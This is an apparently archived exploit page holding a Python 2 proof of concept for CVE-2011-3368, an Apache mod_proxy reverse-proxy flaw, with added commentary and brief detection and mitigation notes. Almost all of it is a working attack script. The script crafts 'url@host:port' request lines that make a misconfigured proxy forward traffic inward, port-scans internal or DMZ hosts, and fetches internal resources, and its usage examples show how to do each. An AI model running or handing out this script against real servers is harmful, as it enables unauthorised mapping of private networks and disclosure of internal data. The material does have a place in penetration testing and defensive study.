Apache HTTP Server 'mod_proxy' Reverse Proxy Information Disclosure Vulnerability
2013-08-19 18:14
#!/usr/bin/env python
# Proof of concept for CVE-2011-3368 (Apache mod_proxy reverse-proxy
# information disclosure), as published on this page. The script is
# Python 2 only: it uses print statements and sends a str over the socket.
#
# How the request is shaped (see send_request): the request-target is
#   "<url>@<internal_target>:<internal_port>/<resource>"
# with a Host header naming the Apache front end. The proxy is coaxed into
# treating the text before "@" as user-info and forwarding the request to
# the inner host:port, so the HTTP status returned by the front end reveals
# whether that inner port answers.
#
# Defender notes:
#  - Detection: a request-target in the access log that contains "@"
#    between the published path and an inner "host:port" is the signature
#    this script produces.
#  - Mitigation: the fix is upstream in Apache; run a patched release.
#    NOTE(review): the advisory for this CVE ties exposure to RewriteRule /
#    ProxyPassMatch patterns that are not anchored with a leading "/" —
#    confirm your proxy rules against the advisory rather than relying on
#    this comment.
import socket
import string
import getopt, sys

# Ports probed when no single port (-e) is given. Stored as ints and
# converted to str in scan_host before being spliced into the request line.
known_ports = [0,21,22,23,25,53,69,80,110,137,139,443,445,3306,3389,5432,5900,8080]

def send_request(url, apache_target, apache_port, internal_target, internal_port, resource):
    """Send one crafted GET through the Apache front end and return the raw reply.

    Args:
        url: path on the front end that the proxy rule matches (str).
        apache_target: hostname/IP of the Apache front end (str).
        apache_port: front-end TCP port as a str; converted with int() here.
        internal_target: inner host placed after the "@" in the request-target.
        internal_port: inner port as a str (callers pass str(port)).
        resource: path requested on the inner host.

    Returns:
        Up to 4096 bytes of the reply, or "" on any exception. Only a
        single recv() is done, so a longer reply is truncated.
    """
    # Request-target deliberately contains "user@host:port/..." so the
    # proxy's URI handling forwards to the inner host.
    get = "GET " + url + "@" + internal_target + ":" + internal_port + "/" + resource + " HTTP/1.1\r\n"
    get = get + "Host: " + apache_target + "\r\n\r\n"
    remoteserver = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    remoteserver.settimeout(3)
    try:
        remoteserver.connect((apache_target, int(apache_port)))
        remoteserver.send(get)
        return remoteserver.recv(4096)
    except:
        # Bare except: a refused/unreachable front end, a timeout and a
        # bad apache_port all collapse into "", which scan_host then
        # reports as a *filtered* inner port. The socket is never closed.
        return ""

def get_banner(result):
    """Return the body of an HTTP reply: everything after the first blank line.

    If "\\r\\n\\r\\n" is absent, string.find returns -1 and the slice starts
    at index 3, i.e. nearly the whole reply is returned unchanged.
    """
    return result[string.find(result, "\r\n\r\n")+4:]

def scan_host(url, apache_target, apache_port, internal_target, tested_ports, resource):
    """Probe each port in tested_ports via the proxy and print a verdict per port.

    Classification is a heuristic on the status line returned by the
    front end: 200, any 30x, or 502 is printed as open (and the body shown);
    an empty reply as filtered; anything else as closed.
    """
    print_banner(url, apache_target, apache_port, internal_target, tested_ports, resource)
    for port in tested_ports:
        # Ports may arrive as int (known_ports) or str (-e option); normalise.
        port = str(port)
        result = send_request(url, apache_target, apache_port, internal_target, port, resource)
        if string.find(result,"HTTP/1.1 200")!=-1 or \
           string.find(result,"HTTP/1.1 30")!=-1 or \
           string.find(result,"HTTP/1.1 502")!=-1:
            print "- Open port: " + port + "/TCP"
            print get_banner(result)
        elif len(result)==0:
            # Also reached when send_request swallowed a local error.
            print "- Filtered port: " + port + "/TCP"
        else:
            print "- Closed port: " + port + "/TCP"

def usage():
    """Print the command-line help text to stdout."""
    print
    print "CVE-2011-3368 proof of concept by Rodrigo Marcos"
    print "http://www.secforce.co.uk"
    print
    print "usage():"
    print "python apache_scan.py [options]"
    print
    print " [options]"
    print " -r: Remote Apache host"
    print " -p: Remote Apache port (default is 80)"
    print " -u: URL on the remote web server (default is /)"
    print " -d: Host in the DMZ (default is 127.0.0.1)"
    print " -e: Port in the DMZ (enables 'single port scan')"
    print " -g: GET request to the host in the DMZ (default is /)"
    print " -h: Help page"
    print
    print "examples:"
    print " - Port scan of the remote host"
    print " python apache_scan.py -r www.example.com -u /images/test.gif"
    print " - Port scan of a host in the DMZ"
    print " python apache_scan.py -r www.example.com -u /images/test.gif -d internalhost.local"
    print " - Retrieve a resource from a host in the DMZ"
    print " python apache_scan.py -r www.example.com -u /images/test.gif -d internalhost.local -e 80 -g /accounts/index.html"
    print

def print_banner(url, apache_target, apache_port, internal_target, tested_ports, resource):
    """Print the run parameters before scanning.

    apache_port is concatenated directly, so it must already be a str;
    tested_ports is passed through str() because it may hold ints.
    The url argument is accepted but not printed.
    """
    print
    print "CVE-2011-3368 proof of concept by Rodrigo Marcos"
    print "http://www.secforce.co.uk"
    print
    print " [+] Target: " + apache_target
    print " [+] Target port: " + apache_port
    print " [+] Internal host: " + internal_target
    print " [+] Tested ports: " + str(tested_ports)
    print " [+] Internal resource: " + resource
    print

def main():
    """Parse argv into the module-level settings and exit on bad usage.

    Writes the globals url, apache_target, apache_port, internal_target,
    internal_port and resource. Exits with status 2 on a getopt error,
    on -h/--help, or when -r was not supplied (apache_target still "").
    """
    global apache_target
    global apache_port
    global url
    global internal_target
    global internal_port
    global resource
    try:
        opts, args = getopt.getopt(sys.argv[1:], "u:r:p:d:e:g:h", ["help"])
    except getopt.GetoptError:
        usage()
        sys.exit(2)
    # NOTE(review): nothing inside this loop calls getopt, so the
    # GetoptError handler below cannot fire; the try/except is dead code.
    try:
        for o, a in opts:
            if o in ("-h", "--help"):
                usage()
                sys.exit(2)
            if o == "-u":
                url=a
            if o == "-r":
                apache_target=a
            if o == "-p":
                apache_port=a
            if o == "-d":
                internal_target = a
            if o == "-e":
                internal_port=a
            if o == "-g":
                resource=a
    except getopt.GetoptError:
        usage()
        sys.exit(2)
    if apache_target == "":
        usage()
        sys.exit(2)

# Script entry: defaults are set first (all kept as str so they can be
# concatenated into the request line), then main() overrides them from argv.
url = "/"
apache_target = ""
apache_port = "80"
internal_target = "127.0.0.1"
internal_port = ""
resource = "/"
main()
# -e selects a single-port scan; otherwise the built-in port list is used.
if internal_port!="":
    tested_ports = [internal_port]
else:
    tested_ports = known_ports
scan_host(url, apache_target, apache_port, internal_target, tested_ports, resource)